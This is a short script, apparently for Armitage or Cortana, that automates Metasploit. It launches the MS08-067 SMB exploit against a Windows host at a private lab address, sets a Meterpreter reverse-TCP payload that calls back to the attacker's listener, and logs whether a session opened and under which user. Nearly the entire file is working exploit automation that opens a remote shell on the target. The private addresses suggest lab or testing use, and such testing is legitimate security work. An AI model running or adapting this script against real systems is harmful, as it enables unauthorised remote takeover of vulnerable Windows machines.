debug (7 | 24)

on ready {
   local('$console $attack $port');
   $console = console();

   cmd($console, "use exploit/windows/smb/ms08_067_netapi");
   cmd($console, "set rhost 172.16.221.132");
   cmd($console, "set lhost 172.16.221.1");
   #cmd($console, "set target 0");
   cmd($console, "set payload windows/meterpreter/reverse_tcp");
   #cmd($console, "set smbpipe browser");
   #cmd($console, "set exitfunc thread");
   cmd($console, "exploit -j");
}

on session_open {
   local('$flag $host $user $sessionNum %r');
   %r = $2;
   $flag = "success";
   $sessionNum = $1;
   $host = %r["host"];
   $user = %r["username"];
   println("$flag" . "," . "$sessionNum" . "," . "$host" . "," . "$user");
   quit();
}

on console_exploit {
   println("Exploit: $1 => $2 => $3");
}

on heartbeat_30s {
   local('$flag $host $user $sessionNum $console @jobid');
   $console = console();
   $flag = "failure";
   $sessionNum = "0";
   $host = "";
   $user = "";
   @jobid = job_ids();
   println(@jobid);
   println("$flag" . "," . "$sessionNum" . "," . "$host" . "," . "$user");
   quit();
}
